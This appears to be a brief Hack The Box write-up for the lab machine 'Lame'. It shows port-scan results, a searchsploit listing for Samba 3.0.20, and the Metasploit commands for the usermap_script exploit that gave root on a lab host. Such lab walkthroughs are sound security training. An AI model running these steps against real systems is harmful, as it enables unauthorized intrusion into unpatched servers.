Lame

'''
ENUMERATION:

NMAP: port 21, 22, 139, 445, 3632

SERVICES:
- 21 vsftpd 2.3.4 
- 22 OpenSSH 4.7p1 Debian 8ubuntu1
- 139, 445 Samba smbd 3.0.20-Debian
- 3632 distccd v1

SEARCHSPLOIT:
kali@kali:~/HTB$ searchsploit samba 3.0.20
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                   | linux_x86/dos/36741.py
-------------------------------------------------------------------------------- ---------------------------------

METASPLOIT:
search samba 3.0.20
14  exploit/multi/samba/usermap_script                     2007-05-14       excellent  No     Samba "username map script" Command Execution

'''

EXPLOIT:
$ msfconsole
msf> search samba 3.0.20
msf> use 14 (search result)
msf> set rhost 10.10.10.3
msf> exploit

'''

PRIVESC:
alreay had root
- found user and root flags